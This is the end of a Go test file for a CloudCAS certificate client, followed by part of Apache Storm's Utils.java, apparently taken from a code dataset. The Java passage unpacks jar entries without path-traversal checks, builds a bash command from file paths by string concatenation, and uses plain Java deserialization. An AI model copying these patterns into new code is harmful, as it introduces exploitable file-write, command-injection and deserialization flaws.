{"ok", fields{okTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: mustParseCertificate(t, testSignedCertificate),
ReasonCode: 1,
}}, &apiv1.RevokeCertificateResponse{
Certificate: mustParseCertificate(t, testSignedCertificate),
CertificateChain: []*x509.Certificate{mustParseCertificate(t, testIntermediateCertificate)},
}, false},
{"fail Extension", fields{okTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: mustParseCertificate(t, testLeafCertificate),
ReasonCode: 1,
}}, nil, true},
{"fail Extension Value", fields{okTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: badExtensionCert,
ReasonCode: 1,
}}, nil, true},
{"fail Certificate", fields{okTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
ReasonCode: 2,
}}, nil, true},
{"fail ReasonCode", fields{okTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: mustParseCertificate(t, testSignedCertificate),
ReasonCode: 100,
}}, nil, true},
{"fail ReasonCode 7", fields{okTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: mustParseCertificate(t, testSignedCertificate),
ReasonCode: 7,
}}, nil, true},
{"fail ReasonCode 8", fields{okTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: mustParseCertificate(t, testSignedCertificate),
ReasonCode: 8,
}}, nil, true},
{"fail RevokeCertificate", fields{failTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: mustParseCertificate(t, testSignedCertificate),
ReasonCode: 1,
}}, nil, true},
{"fail ParseCertificate", fields{badTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: mustParseCertificate(t, testSignedCertificate),
ReasonCode: 1,
}}, nil, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
c := &CloudCAS{
client: tt.fields.client,
certificateAuthority: tt.fields.certificateAuthority,
}
got, err := c.RevokeCertificate(tt.args.req)
if (err != nil) != tt.wantErr {
t.Errorf("CloudCAS.RevokeCertificate() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("CloudCAS.RevokeCertificate() = %v, want %v", got, tt.want)
}
})
}
}
func Test_createCertificateID(t *testing.T) {
buf := new(bytes.Buffer)
setTeeReader(t, buf)
uuid, err := uuid.NewRandomFromReader(rand.Reader)
if err != nil {
t.Fatal(err)
}
rand.Reader = buf
tests := []struct {
name string
want string
wantErr bool
}{
{"ok", uuid.String(), false},
{"fail", "", true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got, err := createCertificateID()
if (err != nil) != tt.wantErr {
t.Errorf("createCertificateID() error = %v, wantErr %v", err, tt.wantErr)
return
}
if got != tt.want {
t.Errorf("createCertificateID() = %v, want %v", got, tt.want)
}
})
}
}
func Test_parseCertificate(t *testing.T) {
type args struct {
pemCert string
}
tests := []struct {
name string
args args
want *x509.Certificate
wantErr bool
}{
{"ok", args{testLeafCertificate}, mustParseCertificate(t, testLeafCertificate), false},
{"ok intermediate", args{testIntermediateCertificate}, mustParseCertificate(t, testIntermediateCertificate), false},
{"fail pem", args{"not pem"}, nil, true},
{"fail parseCertificate", args{"-----BEGIN CERTIFICATE-----\nZm9vYmFyCg==\n-----END CERTIFICATE-----\n"}, nil, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got, err := parseCertificate(tt.args.pemCert)
if (err != nil) != tt.wantErr {
t.Errorf("parseCertificate() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("parseCertificate() = %v, want %v", got, tt.want)
}
})
}
}
func Test_getCertificateAndChain(t *testing.T) {
type args struct {
certpb *pb.Certificate
}
tests := []struct {
name string
args args
want *x509.Certificate
want1 []*x509.Certificate
wantErr bool
}{
{"ok", args{&pb.Certificate{
Name: testCertificateName,
PemCertificate: testSignedCertificate,
PemCertificateChain: []string{testIntermediateCertificate, testRootCertificate},
}}, mustParseCertificate(t, testSignedCertificate), []*x509.Certificate{mustParseCertificate(t, testIntermediateCertificate)}, false},
{"fail PemCertificate", args{&pb.Certificate{
Name: testCertificateName,
PemCertificate: "foobar",
PemCertificateChain: []string{testIntermediateCertificate, testRootCertificate},
}}, nil, nil, true},
{"fail PemCertificateChain", args{&pb.Certificate{
Name: testCertificateName,
PemCertificate: testSignedCertificate,
PemCertificateChain: []string{"foobar", testRootCertificate},
}}, nil, nil, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got, got1, err := getCertificateAndChain(tt.args.certpb)
if (err != nil) != tt.wantErr {
t.Errorf("getCertificateAndChain() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("getCertificateAndChain() got = %v, want %v", got, tt.want)
}
if !reflect.DeepEqual(got1, tt.want1) {
t.Errorf("getCertificateAndChain() got1 = %v, want %v", got1, tt.want1)
}
})
}
}
| [
"\"CI\""
]
| []
| [
"CI"
]
| [] | ["CI"] | go | 1 | 0 | |
storm-core/src/jvm/org/apache/storm/utils/Utils.java | /**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.storm.utils;
import com.google.common.annotations.VisibleForTesting;
import org.apache.commons.compress.archivers.tar.TarArchiveEntry;
import org.apache.commons.compress.archivers.tar.TarArchiveInputStream;
import org.apache.commons.exec.CommandLine;
import org.apache.commons.exec.DefaultExecutor;
import org.apache.commons.exec.ExecuteException;
import org.apache.commons.io.FileUtils;
import org.apache.commons.io.IOUtils;
import org.apache.commons.io.input.ClassLoaderObjectInputStream;
import org.apache.commons.lang.StringUtils;
import org.apache.curator.ensemble.exhibitor.DefaultExhibitorRestClient;
import org.apache.curator.ensemble.exhibitor.ExhibitorEnsembleProvider;
import org.apache.curator.ensemble.exhibitor.Exhibitors;
import org.apache.curator.framework.CuratorFramework;
import org.apache.curator.framework.CuratorFrameworkFactory;
import org.apache.storm.Config;
import org.apache.storm.blobstore.BlobStore;
import org.apache.storm.blobstore.BlobStoreAclHandler;
import org.apache.storm.blobstore.ClientBlobStore;
import org.apache.storm.blobstore.InputStreamWithMeta;
import org.apache.storm.blobstore.LocalFsBlobStore;
import org.apache.storm.daemon.JarTransformer;
import org.apache.storm.generated.AccessControl;
import org.apache.storm.generated.AccessControlType;
import org.apache.storm.generated.AuthorizationException;
import org.apache.storm.generated.ClusterSummary;
import org.apache.storm.generated.ComponentCommon;
import org.apache.storm.generated.ComponentObject;
import org.apache.storm.generated.GlobalStreamId;
import org.apache.storm.generated.KeyNotFoundException;
import org.apache.storm.generated.Nimbus;
import org.apache.storm.generated.ReadableBlobMeta;
import org.apache.storm.generated.SettableBlobMeta;
import org.apache.storm.generated.StormTopology;
import org.apache.storm.generated.TopologyInfo;
import org.apache.storm.generated.TopologySummary;
import org.apache.storm.localizer.Localizer;
import org.apache.storm.nimbus.NimbusInfo;
import org.apache.storm.serialization.DefaultSerializationDelegate;
import org.apache.storm.serialization.SerializationDelegate;
import org.apache.thrift.TBase;
import org.apache.thrift.TDeserializer;
import org.apache.thrift.TException;
import org.apache.thrift.TSerializer;
import org.apache.zookeeper.ZooDefs;
import org.apache.zookeeper.data.ACL;
import org.apache.zookeeper.data.Id;
import org.json.simple.JSONValue;
import org.json.simple.parser.ParseException;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.FileReader;
import java.io.FileWriter;
import java.io.FilenameFilter;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.io.OutputStreamWriter;
import java.io.PrintStream;
import java.io.RandomAccessFile;
import java.io.Serializable;
import java.lang.management.ManagementFactory;
import java.net.InetAddress;
import java.net.URL;
import java.net.URLDecoder;
import java.net.UnknownHostException;
import java.net.ServerSocket;
import java.nio.ByteBuffer;
import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.attribute.PosixFilePermission;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Set;
import java.util.TreeMap;
import java.util.UUID;
import java.util.concurrent.Callable;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;
import clojure.lang.RT;
public class Utils {
// A singleton instance allows us to mock delegated static methods in our
// tests by subclassing.
private static Utils _instance = new Utils();
/**
* Provide an instance of this class for delegates to use. To mock out
* delegated methods, provide an instance of a subclass that overrides the
* implementation of the delegated method.
* @param u a Utils instance
* @return the previously set instance
*/
public static Utils setInstance(Utils u) {
Utils oldInstance = _instance;
_instance = u;
return oldInstance;
}
private static final Logger LOG = LoggerFactory.getLogger(Utils.class);
public static final String DEFAULT_STREAM_ID = "default";
public static final String DEFAULT_BLOB_VERSION_SUFFIX = ".version";
public static final String CURRENT_BLOB_SUFFIX_ID = "current";
public static final String DEFAULT_CURRENT_BLOB_SUFFIX = "." + CURRENT_BLOB_SUFFIX_ID;
private static ThreadLocal<TSerializer> threadSer = new ThreadLocal<TSerializer>();
private static ThreadLocal<TDeserializer> threadDes = new ThreadLocal<TDeserializer>();
private static SerializationDelegate serializationDelegate;
private static ClassLoader cl = ClassLoader.getSystemClassLoader();
public static final boolean IS_ON_WINDOWS = "Windows_NT".equals(System.getenv("OS"));
public static final String FILE_PATH_SEPARATOR = System.getProperty("file.separator");
public static final String CLASS_PATH_SEPARATOR = System.getProperty("path.separator");
public static final int SIGKILL = 9;
public static final int SIGTERM = 15;
static {
Map conf = readStormConfig();
serializationDelegate = getSerializationDelegate(conf);
}
public static <T> T newInstance(String klass) {
try {
return newInstance((Class<T>)Class.forName(klass));
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public static <T> T newInstance(Class<T> klass) {
return _instance.newInstanceImpl(klass);
}
// Non-static impl methods exist for mocking purposes.
public <T> T newInstanceImpl(Class<T> klass) {
try {
return klass.newInstance();
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public static JarTransformer jarTransformer(String klass) {
JarTransformer ret = null;
if (klass != null) {
ret = (JarTransformer)newInstance(klass);
}
return ret;
}
public static byte[] serialize(Object obj) {
return serializationDelegate.serialize(obj);
}
public static <T> T deserialize(byte[] serialized, Class<T> clazz) {
return serializationDelegate.deserialize(serialized, clazz);
}
public static <T> T thriftDeserialize(Class c, byte[] b, int offset, int length) {
try {
T ret = (T) c.newInstance();
TDeserializer des = getDes();
des.deserialize((TBase) ret, b, offset, length);
return ret;
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public static byte[] javaSerialize(Object obj) {
try {
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(obj);
oos.close();
return bos.toByteArray();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
public static <T> T javaDeserialize(byte[] serialized, Class<T> clazz) {
try {
ByteArrayInputStream bis = new ByteArrayInputStream(serialized);
ObjectInputStream ois = new ClassLoaderObjectInputStream(cl, bis);
Object ret = ois.readObject();
ois.close();
return (T)ret;
} catch (IOException ioe) {
throw new RuntimeException(ioe);
} catch (ClassNotFoundException e) {
throw new RuntimeException(e);
}
}
public static byte[] gzip(byte[] data) {
try {
ByteArrayOutputStream bos = new ByteArrayOutputStream();
GZIPOutputStream out = new GZIPOutputStream(bos);
out.write(data);
out.close();
return bos.toByteArray();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
public static byte[] gunzip(byte[] data) {
try {
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ByteArrayInputStream bis = new ByteArrayInputStream(data);
GZIPInputStream in = new GZIPInputStream(bis);
byte[] buffer = new byte[1024];
int len = 0;
while ((len = in.read(buffer)) >= 0) {
bos.write(buffer, 0, len);
}
in.close();
bos.close();
return bos.toByteArray();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
public static byte[] toCompressedJsonConf(Map<String, Object> stormConf) {
try {
ByteArrayOutputStream bos = new ByteArrayOutputStream();
OutputStreamWriter out = new OutputStreamWriter(new GZIPOutputStream(bos));
JSONValue.writeJSONString(stormConf, out);
out.close();
return bos.toByteArray();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
public static Map<String, Object> fromCompressedJsonConf(byte[] serialized) {
try {
ByteArrayInputStream bis = new ByteArrayInputStream(serialized);
InputStreamReader in = new InputStreamReader(new GZIPInputStream(bis));
Object ret = JSONValue.parseWithException(in);
in.close();
return (Map<String,Object>)ret;
} catch (IOException ioe) {
throw new RuntimeException(ioe);
} catch (ParseException e) {
throw new RuntimeException(e);
}
}
public static <T> String join(Iterable<T> coll, String sep) {
Iterator<T> it = coll.iterator();
StringBuilder ret = new StringBuilder();
while(it.hasNext()) {
ret.append(it.next());
if(it.hasNext()) {
ret.append(sep);
}
}
return ret.toString();
}
public static long bitXorVals(List<Long> coll) {
long result = 0;
for (Long val : coll) {
result ^= val;
}
return result;
}
public static void sleep(long millis) {
try {
Time.sleep(millis);
} catch(InterruptedException e) {
throw new RuntimeException(e);
}
}
public static List<URL> findResources(String name) {
try {
Enumeration<URL> resources = Thread.currentThread().getContextClassLoader().getResources(name);
List<URL> ret = new ArrayList<URL>();
while (resources.hasMoreElements()) {
ret.add(resources.nextElement());
}
return ret;
} catch(IOException e) {
throw new RuntimeException(e);
}
}
public static Map findAndReadConfigFile(String name, boolean mustExist) {
InputStream in = null;
boolean confFileEmpty = false;
try {
in = getConfigFileInputStream(name);
if (null != in) {
Yaml yaml = new Yaml(new SafeConstructor());
Map ret = (Map) yaml.load(new InputStreamReader(in));
if (null != ret) {
return new HashMap(ret);
} else {
confFileEmpty = true;
}
}
if (mustExist) {
if(confFileEmpty)
throw new RuntimeException("Config file " + name + " doesn't have any valid storm configs");
else
throw new RuntimeException("Could not find config file on classpath " + name);
} else {
return new HashMap();
}
} catch (IOException e) {
throw new RuntimeException(e);
} finally {
if (null != in) {
try {
in.close();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
}
}
private static InputStream getConfigFileInputStream(String configFilePath)
throws IOException {
if (null == configFilePath) {
throw new IOException(
"Could not find config file, name not specified");
}
HashSet<URL> resources = new HashSet<URL>(findResources(configFilePath));
if (resources.isEmpty()) {
File configFile = new File(configFilePath);
if (configFile.exists()) {
return new FileInputStream(configFile);
}
} else if (resources.size() > 1) {
throw new IOException(
"Found multiple " + configFilePath
+ " resources. You're probably bundling the Storm jars with your topology jar. "
+ resources);
} else {
LOG.debug("Using "+configFilePath+" from resources");
URL resource = resources.iterator().next();
return resource.openStream();
}
return null;
}
public static Map findAndReadConfigFile(String name) {
return findAndReadConfigFile(name, true);
}
public static Map readDefaultConfig() {
return findAndReadConfigFile("defaults.yaml", true);
}
public static Map readCommandLineOpts() {
Map ret = new HashMap();
String commandOptions = System.getProperty("storm.options");
if (commandOptions != null) {
/*
Below regex uses negative lookahead to not split in the middle of json objects '{}'
or json arrays '[]'. This is needed to parse valid json object/arrays passed as options
via 'storm.cmd' in windows. This is not an issue while using 'storm.py' since it url-encodes
the options and the below regex just does a split on the commas that separates each option.
Note:- This regex handles only valid json strings and could produce invalid results
if the options contain un-encoded invalid json or strings with unmatched '[, ], { or }'. We can
replace below code with split(",") once 'storm.cmd' is fixed to send url-encoded options.
*/
String[] configs = commandOptions.split(",(?![^\\[\\]{}]*(]|}))");
for (String config : configs) {
config = URLDecoder.decode(config);
String[] options = config.split("=", 2);
if (options.length == 2) {
Object val = options[1];
try {
val = JSONValue.parseWithException(options[1]);
} catch (ParseException ignored) {
//fall back to string, which is already set
}
ret.put(options[0], val);
}
}
}
return ret;
}
public static Map readStormConfig() {
Map ret = readDefaultConfig();
String confFile = System.getProperty("storm.conf.file");
Map storm;
if (confFile == null || confFile.equals("")) {
storm = findAndReadConfigFile("storm.yaml", false);
} else {
storm = findAndReadConfigFile(confFile, true);
}
ret.putAll(storm);
ret.putAll(readCommandLineOpts());
return ret;
}
private static Object normalizeConf(Object conf) {
if (conf == null) return new HashMap();
if (conf instanceof Map) {
Map<Object, Object> confMap = new HashMap((Map) conf);
for (Map.Entry<Object, Object> entry : confMap.entrySet()) {
confMap.put(entry.getKey(), normalizeConf(entry.getValue()));
}
return confMap;
} else if (conf instanceof List) {
List confList = new ArrayList((List) conf);
for (int i = 0; i < confList.size(); i++) {
Object val = confList.get(i);
confList.set(i, normalizeConf(val));
}
return confList;
} else if (conf instanceof Integer) {
return ((Integer) conf).longValue();
} else if (conf instanceof Float) {
return ((Float) conf).doubleValue();
} else {
return conf;
}
}
public static boolean isValidConf(Map<String, Object> stormConf) {
return normalizeConf(stormConf).equals(normalizeConf((Map) JSONValue.parse(JSONValue.toJSONString(stormConf))));
}
public static Object getSetComponentObject(ComponentObject obj) {
if (obj.getSetField() == ComponentObject._Fields.SERIALIZED_JAVA) {
return Utils.javaDeserialize(obj.get_serialized_java(), Serializable.class);
} else if (obj.getSetField() == ComponentObject._Fields.JAVA_OBJECT) {
return obj.get_java_object();
} else {
return obj.get_shell();
}
}
public static <S, T> T get(Map<S, T> m, S key, T def) {
T ret = m.get(key);
if (ret == null) {
ret = def;
}
return ret;
}
public static List<Object> tuple(Object... values) {
List<Object> ret = new ArrayList<Object>();
for (Object v : values) {
ret.add(v);
}
return ret;
}
public static Localizer createLocalizer(Map conf, String baseDir) {
return new Localizer(conf, baseDir);
}
public static ClientBlobStore getClientBlobStoreForSupervisor(Map conf) {
ClientBlobStore store = (ClientBlobStore) newInstance(
(String) conf.get(Config.SUPERVISOR_BLOBSTORE));
store.prepare(conf);
return store;
}
public static BlobStore getNimbusBlobStore(Map conf, NimbusInfo nimbusInfo) {
return getNimbusBlobStore(conf, null, nimbusInfo);
}
public static BlobStore getNimbusBlobStore(Map conf, String baseDir, NimbusInfo nimbusInfo) {
String type = (String)conf.get(Config.NIMBUS_BLOBSTORE);
if (type == null) {
type = LocalFsBlobStore.class.getName();
}
BlobStore store = (BlobStore) newInstance(type);
HashMap nconf = new HashMap(conf);
// only enable cleanup of blobstore on nimbus
nconf.put(Config.BLOBSTORE_CLEANUP_ENABLE, Boolean.TRUE);
if(store != null) {
// store can be null during testing when mocking utils.
store.prepare(nconf, baseDir, nimbusInfo);
}
return store;
}
/**
* Meant to be called only by the supervisor for stormjar/stormconf/stormcode files.
* @param key
* @param localFile
* @param cb
* @throws AuthorizationException
* @throws KeyNotFoundException
* @throws IOException
*/
public static void downloadResourcesAsSupervisor(String key, String localFile,
ClientBlobStore cb) throws AuthorizationException, KeyNotFoundException, IOException {
final int MAX_RETRY_ATTEMPTS = 2;
final int ATTEMPTS_INTERVAL_TIME = 100;
for (int retryAttempts = 0; retryAttempts < MAX_RETRY_ATTEMPTS; retryAttempts++) {
if (downloadResourcesAsSupervisorAttempt(cb, key, localFile)) {
break;
}
Utils.sleep(ATTEMPTS_INTERVAL_TIME);
}
}
public static ClientBlobStore getClientBlobStore(Map conf) {
ClientBlobStore store = (ClientBlobStore) Utils.newInstance((String) conf.get(Config.CLIENT_BLOBSTORE));
store.prepare(conf);
return store;
}
private static boolean downloadResourcesAsSupervisorAttempt(ClientBlobStore cb, String key, String localFile) {
boolean isSuccess = false;
FileOutputStream out = null;
InputStreamWithMeta in = null;
try {
out = new FileOutputStream(localFile);
in = cb.getBlob(key);
long fileSize = in.getFileLength();
byte[] buffer = new byte[1024];
int len;
int downloadFileSize = 0;
while ((len = in.read(buffer)) >= 0) {
out.write(buffer, 0, len);
downloadFileSize += len;
}
isSuccess = (fileSize == downloadFileSize);
} catch (TException | IOException e) {
LOG.error("An exception happened while downloading {} from blob store.", localFile, e);
} finally {
try {
if (out != null) {
out.close();
}
} catch (IOException ignored) {}
try {
if (in != null) {
in.close();
}
} catch (IOException ignored) {}
}
if (!isSuccess) {
try {
Files.deleteIfExists(Paths.get(localFile));
} catch (IOException ex) {
LOG.error("Failed trying to delete the partially downloaded {}", localFile, ex);
}
}
return isSuccess;
}
public static boolean checkFileExists(String path) {
return Files.exists(new File(path).toPath());
}
public static boolean checkFileExists(String dir, String file) {
return checkFileExists(dir + "/" + file);
}
public static boolean CheckDirExists(String dir) {
File file = new File(dir);
return file.isDirectory();
}
public static long nimbusVersionOfBlob(String key, ClientBlobStore cb) throws AuthorizationException, KeyNotFoundException {
long nimbusBlobVersion = 0;
ReadableBlobMeta metadata = cb.getBlobMeta(key);
nimbusBlobVersion = metadata.get_version();
return nimbusBlobVersion;
}
public static String getFileOwner(String path) throws IOException {
return Files.getOwner(FileSystems.getDefault().getPath(path)).getName();
}
public static long localVersionOfBlob(String localFile) {
File f = new File(localFile + DEFAULT_BLOB_VERSION_SUFFIX);
long currentVersion = 0;
if (f.exists() && !(f.isDirectory())) {
BufferedReader br = null;
try {
br = new BufferedReader(new FileReader(f));
String line = br.readLine();
currentVersion = Long.parseLong(line);
} catch (IOException e) {
throw new RuntimeException(e);
} finally {
try {
if (br != null) {
br.close();
}
} catch (Exception ignore) {
LOG.error("Exception trying to cleanup", ignore);
}
}
return currentVersion;
} else {
return -1;
}
}
public static String constructBlobWithVersionFileName(String fileName, long version) {
return fileName + "." + version;
}
public static String constructBlobCurrentSymlinkName(String fileName) {
return fileName + Utils.DEFAULT_CURRENT_BLOB_SUFFIX;
}
public static String constructVersionFileName(String fileName) {
return fileName + Utils.DEFAULT_BLOB_VERSION_SUFFIX;
}
// only works on operating systems that support posix
public static void restrictPermissions(String baseDir) {
try {
Set<PosixFilePermission> perms = new HashSet<PosixFilePermission>(
Arrays.asList(PosixFilePermission.OWNER_READ, PosixFilePermission.OWNER_WRITE,
PosixFilePermission.OWNER_EXECUTE, PosixFilePermission.GROUP_READ,
PosixFilePermission.GROUP_EXECUTE));
Files.setPosixFilePermissions(FileSystems.getDefault().getPath(baseDir), perms);
} catch (IOException e) {
throw new RuntimeException(e);
}
}
public static synchronized clojure.lang.IFn loadClojureFn(String namespace, String name) {
try {
clojure.lang.Compiler.eval(RT.readString("(require '" + namespace + ")"));
} catch (Exception e) {
//if playing from the repl and defining functions, file won't exist
}
return (clojure.lang.IFn) RT.var(namespace, name).deref();
}
public static boolean isSystemId(String id) {
return id.startsWith("__");
}
public static ComponentCommon getComponentCommon(StormTopology topology, String id) {
if (topology.get_spouts().containsKey(id)) {
return topology.get_spouts().get(id).get_common();
}
if (topology.get_bolts().containsKey(id)) {
return topology.get_bolts().get(id).get_common();
}
if (topology.get_state_spouts().containsKey(id)) {
return topology.get_state_spouts().get(id).get_common();
}
throw new IllegalArgumentException("Could not find component with id " + id);
}
public static List<String> getStrings(final Object o) {
if (o == null) {
return new ArrayList<String>();
} else if (o instanceof String) {
return new ArrayList<String>() {{ add((String) o); }};
} else if (o instanceof Collection) {
List<String> answer = new ArrayList<String>();
for (Object v : (Collection) o) {
answer.add(v.toString());
}
return answer;
} else {
throw new IllegalArgumentException("Don't know how to convert to string list");
}
}
public static String getString(Object o) {
if (null == o) {
throw new IllegalArgumentException("Don't know how to convert null to String");
}
return o.toString();
}
public static Integer getInt(Object o) {
Integer result = getInt(o, null);
if (null == result) {
throw new IllegalArgumentException("Don't know how to convert null to int");
}
return result;
}
private static TDeserializer getDes() {
TDeserializer des = threadDes.get();
if(des == null) {
des = new TDeserializer();
threadDes.set(des);
}
return des;
}
public static byte[] thriftSerialize(TBase t) {
try {
TSerializer ser = threadSer.get();
if (ser == null) {
ser = new TSerializer();
threadSer.set(ser);
}
return ser.serialize(t);
} catch (TException e) {
LOG.error("Failed to serialize to thrift: ", e);
throw new RuntimeException(e);
}
}
public static <T> T thriftDeserialize(Class c, byte[] b) {
try {
return Utils.thriftDeserialize(c, b, 0, b.length);
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public static Integer getInt(Object o, Integer defaultValue) {
if (null == o) {
return defaultValue;
}
if (o instanceof Integer ||
o instanceof Short ||
o instanceof Byte) {
return ((Number) o).intValue();
} else if (o instanceof Long) {
final long l = (Long) o;
if (l <= Integer.MAX_VALUE && l >= Integer.MIN_VALUE) {
return (int) l;
}
} else if (o instanceof String) {
return Integer.parseInt((String) o);
}
throw new IllegalArgumentException("Don't know how to convert " + o + " to int");
}
public static Double getDouble(Object o) {
Double result = getDouble(o, null);
if (null == result) {
throw new IllegalArgumentException("Don't know how to convert null to double");
}
return result;
}
public static Double getDouble(Object o, Double defaultValue) {
if (null == o) {
return defaultValue;
}
if (o instanceof Number) {
return ((Number) o).doubleValue();
} else {
throw new IllegalArgumentException("Don't know how to convert " + o + " + to double");
}
}
public static boolean getBoolean(Object o, boolean defaultValue) {
if (null == o) {
return defaultValue;
}
if (o instanceof Boolean) {
return (Boolean) o;
} else {
throw new IllegalArgumentException("Don't know how to convert " + o + " + to boolean");
}
}
public static String getString(Object o, String defaultValue) {
if (null == o) {
return defaultValue;
}
if (o instanceof String) {
return (String) o;
} else {
throw new IllegalArgumentException("Don't know how to convert " + o + " + to String");
}
}
public static long secureRandomLong() {
return UUID.randomUUID().getLeastSignificantBits();
}
/**
* Unpack matching files from a jar. Entries inside the jar that do
* not match the given pattern will be skipped.
*
* @param jarFile the .jar file to unpack
* @param toDir the destination directory into which to unpack the jar
*/
public static void unJar(File jarFile, File toDir)
throws IOException {
JarFile jar = new JarFile(jarFile);
try {
Enumeration<JarEntry> entries = jar.entries();
while (entries.hasMoreElements()) {
final JarEntry entry = entries.nextElement();
if (!entry.isDirectory()) {
InputStream in = jar.getInputStream(entry);
try {
File file = new File(toDir, entry.getName());
ensureDirectory(file.getParentFile());
OutputStream out = new FileOutputStream(file);
try {
copyBytes(in, out, 8192);
} finally {
out.close();
}
} finally {
in.close();
}
}
}
} finally {
jar.close();
}
}
/**
* Copies from one stream to another.
*
* @param in InputStream to read from
* @param out OutputStream to write to
* @param buffSize the size of the buffer
*/
public static void copyBytes(InputStream in, OutputStream out, int buffSize)
throws IOException {
PrintStream ps = out instanceof PrintStream ? (PrintStream)out : null;
byte buf[] = new byte[buffSize];
int bytesRead = in.read(buf);
while (bytesRead >= 0) {
out.write(buf, 0, bytesRead);
if ((ps != null) && ps.checkError()) {
throw new IOException("Unable to write to output stream.");
}
bytesRead = in.read(buf);
}
}
/**
* Ensure the existence of a given directory.
*
* @throws IOException if it cannot be created and does not already exist
*/
private static void ensureDirectory(File dir) throws IOException {
if (!dir.mkdirs() && !dir.isDirectory()) {
throw new IOException("Mkdirs failed to create " +
dir.toString());
}
}
/**
* Given a Tar File as input it will untar the file in a the untar directory
* passed as the second parameter
* <p/>
* This utility will untar ".tar" files and ".tar.gz","tgz" files.
*
* @param inFile The tar file as input.
* @param untarDir The untar directory where to untar the tar file.
* @throws IOException
*/
public static void unTar(File inFile, File untarDir) throws IOException {
if (!untarDir.mkdirs()) {
if (!untarDir.isDirectory()) {
throw new IOException("Mkdirs failed to create " + untarDir);
}
}
boolean gzipped = inFile.toString().endsWith("gz");
if (isOnWindows()) {
// Tar is not native to Windows. Use simple Java based implementation for
// tests and simple tar archives
unTarUsingJava(inFile, untarDir, gzipped);
} else {
// spawn tar utility to untar archive for full fledged unix behavior such
// as resolving symlinks in tar archives
unTarUsingTar(inFile, untarDir, gzipped);
}
}
private static void unTarUsingTar(File inFile, File untarDir,
boolean gzipped) throws IOException {
StringBuffer untarCommand = new StringBuffer();
if (gzipped) {
untarCommand.append(" gzip -dc '");
untarCommand.append(inFile.toString());
untarCommand.append("' | (");
}
untarCommand.append("cd '");
untarCommand.append(untarDir.toString());
untarCommand.append("' ; ");
untarCommand.append("tar -xf ");
if (gzipped) {
untarCommand.append(" -)");
} else {
untarCommand.append(inFile.toString());
}
String[] shellCmd = {"bash", "-c", untarCommand.toString()};
ShellUtils.ShellCommandExecutor shexec = new ShellUtils.ShellCommandExecutor(shellCmd);
shexec.execute();
int exitcode = shexec.getExitCode();
if (exitcode != 0) {
throw new IOException("Error untarring file " + inFile +
". Tar process exited with exit code " + exitcode);
}
}
private static void unTarUsingJava(File inFile, File untarDir,
boolean gzipped) throws IOException {
InputStream inputStream = null;
try {
if (gzipped) {
inputStream = new BufferedInputStream(new GZIPInputStream(
new FileInputStream(inFile)));
} else {
inputStream = new BufferedInputStream(new FileInputStream(inFile));
}
try (TarArchiveInputStream tis = new TarArchiveInputStream(inputStream)) {
for (TarArchiveEntry entry = tis.getNextTarEntry(); entry != null; ) {
unpackEntries(tis, entry, untarDir);
entry = tis.getNextTarEntry();
}
}
} finally {
if(inputStream != null) {
inputStream.close();
}
}
}
private static void unpackEntries(TarArchiveInputStream tis,
